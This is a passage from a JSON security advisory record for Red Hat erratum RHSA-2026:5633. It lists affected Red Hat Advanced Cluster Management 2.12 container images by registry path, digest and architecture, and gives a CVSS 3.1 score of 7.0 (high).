"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:c11c8ba588a27d39f1b46bc6b63eebd8e9f9a822917a7638216c7fb93350aaf3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:0184923381940f806687d21a3422e16bee10b39b409fcecb50c940ed9b7e4d58_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:54390653fd89def95d9cba388cd37466ce709d843a9950b545091d9d9e14b4e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:874f930ace72bd2771944e734432c322735b3bd91804019b211953070a308dd9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:d865a100823ff771c33e5e5799f16e1207158ab7519c6ac8a4daf53e1c4ae092_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:57fb017c2ba0f20880fc278689d37919ab95a88dffa0626d9a48050bef3b6fe3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:7d87a9cda623d527c5eaa08c5637422ed136339a9688edd5e8e9cc46f254beb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:b123eb6e855ec01a82e6ec2afa052eb344e2851b3d134514c53162012852d568_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:f12861597e8d62263d2ffa52b1fd19614a063605968999aeef33f444cfa82539_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:4f666d6acef380066f2a35f128a2842ee1f5cf800c93ac6b0fb3c303d3bde26b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:6938b16a6314149cc86e10a91e05e9b84e00483dadd1d0353002222a350746bf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:8b91cd509eee3e1a5e6475076512709bd233413bfbea5caa44455fd62bcc9d35_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:f734a96076321df1f52da24f047db29d3956ceb742f4fa488a11d5b302faf66f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:1395a46c08410f06aa507bedc8d664b6dabda344d9c604bd71bbd07fb07966c4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:4b1bdbd8499769e3fe41d438ff2f98a0a91fecf88d70aa359a6be16aa5454fda_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:91d0b7afff7c89c667986f22280a95ab81409aacaf6c73ac6606bc7bbae98c7e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:c24affed309531bede6ca42f8b2a6b3ba4df5a8c59084bf5050290b8f031f364_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:8b4adb87be3cd1222dbec53de842569d89f1edc18f36f5da691f2b9aef851af8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a5544dbf33ee411c1e2bce8af5cfd7defda6de92a358097419f2bac069669275_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b3caff7e4a5254b20d305ec57b70d372ba09a4605047812703a7c7df6628192b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:cde651ab8f772b65d45464e4997c6ae17e655696afebf3ad51aa079853627061_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:33ae10350417be44904c47179d655c36e5724241e5dd1497d6952c46ada085e3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:92c1123b4f6c4e89be7a0d9cd4adcafb9b97faebebd61dc24127661e45b61ec7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b321bc989aede13694825dfa5ee6e6bf047e1d8da91a8fb83dc29cd0b27ab4ff_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:d41b061123db846fb27ddccffa7c57528326bcfa109f7d0a754e64aa16304b05_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:19ccb43f156361e14c8d69a6d832b60a63801fec502bd0f1632a264611c00a5c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:345bd79af661294f223be69961f96494da36e311906fb3a2e64b53677f65fd32_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:3cb2dd7e3a2cd4e2a46cde1f48dd72645c2c51e8bfc0eca8753cc851c726d29c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c834685380ba00674a2835151ec9e4932457abefe6318748aba92cbe8443307d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:0799283c1830e1aadd09976286eec671d0a86e44c155238279938b4f329f7157_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:7143a1a00eae582cff7671ab03464db03db48e89bd988ecc4851278922aeea29_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9bac11bcf557740673e7168bb31fb6db8c5d92609094e5f1d1cb4c3ef6bc9603_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:ea03fd92669382846af5c8fa0b58f6858f123060d122f370d6af837f46d9d8aa_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5c90f0eddf6dbee5bdf11a6a818e4fbac22f6c8b2883728416dcc7aaeedd7362_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6528ed4780303fa09312c19f87c0f7d7109d91858473f73e6567e0fdde694b3f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6d1a86ffe09cbc6eba216db55800c21641e308dd1cee215972e0065136b9c612_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:fc6ea36b48ce47052d875988f378cad3ec9cec80189a605acdf1509f2beb52cf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:31153305711975b0bd5f780133699aeca52e96859363e85718c9047b26a32dbf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:55b2f0e54a6fdb3fb83f1af1f16524ebf36f0afb366f40fbbc8768cd4995ffb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:6be8bc17e09b099a79437f27ded3d563814e3c6702dd9ed698f5f17b9fb3afa2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:73c4ce25c2cc67fe3bec0cfc51e4c8b34929288f931f0f19c65bbbc969d0c588_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:128b74a18fb1fd1ba63f074d9d31e892a46048068608784f2696a4bbc7b57595_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:6b3fd2f8e3a164670dbbc59fd8c77057f98d97c0ba6ed7975711923e8acabb78_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:7c8de9466fee7334af1fef5647c4abaf9bd6b6012c301bb5c3c6a630cdc1dded_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bbd945e3d0f92c8dfeb5601d7aa4d306f87e6facd9471a3c42f2582a264cd2ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:3aa3b11dfb3e0c9daba4818838a3a42e52ab81ecf27fb5fddd779746fd10d6d8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:8c19e6e38d755f35021ed1c57f3e69be65240df37539b72b8fe0d3f8ab050e36_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a8f9a5a9f31cd903f23dfec9c832ed703d06882246aad25bd03e9512b633e5ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:e528d7996cda9185d5858a0edd8114b782d5627725d6e350fb087ba9f6270206_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:6a4fe92a913d7b778b8e756c618537c4a44aba7adc980355afcaf88b5cb871e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:b2563c07d52bd29574e0a896a2e72b90ff1144be31ec3dab9f89840be79936df_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:baacec8e68f6fcc0f4ee99f4405f80c560be369ec969a574534b01f43419a15d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:c7a24bf421728915b2e0cf3a7e803cbb18032959feab0cd2867b13f356136178_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:2fdcbd70cddfd8ef3d3211529434f24f69ff79fae57143e5ce66452a613b5c56_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:3d863c8706fca20261d46d0591ca2c18d34db98c5341136c840a80d0c285520c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:83eda40795e9b589114cddae252af2fc68ccf76b2a73522ad1094b2f84829be7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e94fb4d6c912c989e11532bd86fe3a2eab5b17329fb3b11362be651609863a50_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:030626d6ba921752acbc68159d7a6776318416c93cfc4360ef8e3c145e9ee635_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:0bdccbe184d904b58291858f01597286b2a0c45584f9af263714089911390f4c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:5fd8d966136617fd453431a649a6572ad640ca515b91c86b9a576c7b1e4fbd0e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:c6b267f6f0bb960032c380a0d978ebe3c8cd948f57a92ba9855c273fbd40a487_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5633"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:20a379058f6e7b95ba010b0ceb936e124a67ad493975557c4bfe085948166b6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7fb6e4b9729a300d9e82207ede660b52c2566fcdfb1f7174e5dd4cd59514afdf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:8a842f5c48c760be11d7df87fc2519bd9a68886bce7240aabea3e7a99c6bc172_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:fdcd8eff118d00b93f7a197c992bd5ddd1cce96b2b5cf3b542403dcbcc812691_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:59a7ad296b2023d6a633e2f7b99767e2c0c35ead31c8d92bdf233ff52522125d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:5a1fba286678b5d606a3ad553041cd68df207820c5f11685f7df0e94d04c27e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:60546ec2d4128da096811949b2609bdb9c7cb6205b36673ebe9d7b1ff868ea88_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:647b86bfc09d7eca6a7c3f7ee967ea60db1b90329600a0898f8f8b7bbdb204bf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:495889c3607c289f7265ef7bf18187686fedcbf8c382e86e8e98cdc31e8479d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:519bd85630bb8c1eac29ca79a21a09e949fbe507e4186fe5d990c357517731a7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b97cb625d22889517ef86b148ca4bfcc20e39bb887e0715ac37bd915cf45a83b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:d92337026de448a873fe66754e1ea837f7a650b4c8b1a057cbef1cceb6ae114a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:1ba9482f4a157a04b4b5cc212b7cbb98a323250969501698b230432a6ea545a5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:371bbcd62cb8e6c28cd3c1921e17c9067bc160433c4a6b14a1a2685a5f7d0519_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:922167d560484b217f772384cac0e9da48c31633ebf8984abf3ef99f5c31919b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:fd95f9c98201fc9e2deb2ce1af7598056e7e2bd61e2db42d195fa8acd4958f79_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:280e1dc73ea367d9c818086754ece9ea2d5a2c96496dcfea09844a7a55feb51d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:2d8b0b11cf907b25304501a2a62d5551c792c1fb3662ea4cd0e01db724a57b86_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:9abfdfd7491e219d7249800e05298472c4d545687fa7b6c79da71f9414f29d12_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:c11c8ba588a27d39f1b46bc6b63eebd8e9f9a822917a7638216c7fb93350aaf3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:16710678f62e24a8877350bfdada7b8a533d4abad81984145e31614dc0e64d26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:88c844cba042e1cd006c3ad413808ad10c4bdb95e8c0fc7b79cec3c3c40882b1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:d32bc1e886821ba104e8b2a5e16dc7b0aa1a01ea927e426ebd264298ac1d66f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f09e16c30c4641612b2306cdbf56f85e31e03028d522597adf2e00f781148254_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:0dbdb9d02b41e437dd885741918114d8eea5bcdb1e97098b8e026adaf0cc70de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:5a2014800be744b5034e754ad88cc82c29779c629cf2aa52068274aecd7b9d88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:dc38a15065a73653097c85f6eb1b287a97498bc69dd86e7dbcd9efe6853255bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:f544c239f288daac99ca0018719000678f2e9f27b8303a5182fa01777c4c12f0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:0184923381940f806687d21a3422e16bee10b39b409fcecb50c940ed9b7e4d58_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:54390653fd89def95d9cba388cd37466ce709d843a9950b545091d9d9e14b4e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:874f930ace72bd2771944e734432c322735b3bd91804019b211953070a308dd9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:d865a100823ff771c33e5e5799f16e1207158ab7519c6ac8a4daf53e1c4ae092_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:57fb017c2ba0f20880fc278689d37919ab95a88dffa0626d9a48050bef3b6fe3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:7d87a9cda623d527c5eaa08c5637422ed136339a9688edd5e8e9cc46f254beb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:b123eb6e855ec01a82e6ec2afa052eb344e2851b3d134514c53162012852d568_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:f12861597e8d62263d2ffa52b1fd19614a063605968999aeef33f444cfa82539_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:28ca07a0f4c2f02d47bfecae31110cbdc3284f1a7d688b559ed7d6305930ce81_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:713fafc87903d4284173e4b9690d0e3deba23d51ca0974106f0a76a450c38501_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:9a6847c058acd9d84d402506ac00576e0c437edb261c8e564605abab1b97428c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:c033acafe192f185dde20f032d399de7f4f9d25804ba96afe50e08eb1608a956_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:40cfab127e82cc6afc68b0642832e84ec45838db71d5500a42d87921ade70171_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:6dbefefd5b830cd9431559d7123d9643dca69e0cbbb58f5c5cc90f3d5e526c09_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:8262fa7a50560e0ac051f9ec158daceeb384acc92b1f98c0b7b73f5ec0451908_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:b2ee688170d432298a3eb7d0b057a01bcba26dfddfeabca7941f4bc3fc865141_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0478cb24ab3df5826881b91dd0ea1b8152defdd04e38d0bc500a860a828716b0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:247872fe30c6d0bbb1098b6f189fd23aca2357122e591eb2bed3c79b0fe27055_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b6a958526ae7d64016a110bd81ee38218bce014d52f10a6517a471bddfb93d45_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:ee89796a7ee9e6ab9cde9a5a450e16221bbdb74444188939c983d6d185bee08a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:243d75725446e0fe6be10ba04796c4db395f911470d1fd2575d35a3f1c82930c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:89f973ff38fcf35a484da1531bcf00db5e1d387a64a6dcbb25f19a5c26494584_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:a33b245208c9999546524f3bf971bb220418045dd799cebc43f0413823db0f8b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ea918d66e2be8cc1411e048f3638afae348a44df36143621bcd3132718b33664_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:22b747e9952ede6b831297b64684acaafaf3e12998d6872081a08ae39b52c87b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:5d368764b9745d9a977bde3c4cd2faac1a344aea716ce626a0904b7da80f5267_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:8deed2b9ade0bc7ab30fd93d165fc1a8e18caab7b4af1d1b2b326dc93570c498_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:b68a3a1fe74bc4b319859874ca19a4e35c72174afc6a2af08e4bd7b64898d27f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5f814b2ab34c4dcaedb7394d9f1ef9bd4d1bf6af934cd716ac44d1cfc43a6edf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:9acfa5180f02a68485cd1fc43e4794c7ffbac02c16942fabfbad9dd586c8ff74_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c409f96ae15f3022713e434c4c8f146d943dbf48e852e0b8f90b4964ec0736a7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f72ecb77638a3d19ef4480040995278031deb4551f139e376994bc0ac3462ef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:243ea42175c4fa3d189e2f2bf061c9645d5d3b2870378149c52740f563c91ce8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3b23775b863a11e1edd62b24c01085b74019b7f414d0784c99d41b1e0e8a6e9b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3e29508feb3f13f4771e6321f9b2f281d557e3239e52e29301ef30a305ffcde9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:427b347a2e17b66849dc51f9a62563ae8c013d5794c61821141dec737d059304_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:0b87acce1304734d30b2bfbd5d277e72efce2433680111e02fc5cff8127376dd_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:438093777b18dc840316a9a82331d832fdc9f3d83aaae20d97f56ed67b58a359_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:93d29e5678d618cfa84ce60f2d62ba96929ea47ec1515f63a9d61d548968e902_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b182a45fbe8caf69df6145ed79f2ab0e82c955ff5f5caa7fab8d0faffdb50664_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:0d6238ef864831d455a4a4b86d860469443079f6dcd26ce3b4fe546800565844_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:5c7378c5f1715490a88eaa2b791b4a643ee089f9b72ad4abfaf32d718f387fc8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:7e8f4c171a3081e428c168b506c544775876df772803e2cae4512d3c46b45354_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:8b0e5d09b887020a657b93953a63a788cf6dfc84200038be8417c2f9cd1df736_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:4f666d6acef380066f2a35f128a2842ee1f5cf800c93ac6b0fb3c303d3bde26b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:6938b16a6314149cc86e10a91e05e9b84e00483dadd1d0353002222a350746bf_amd64",
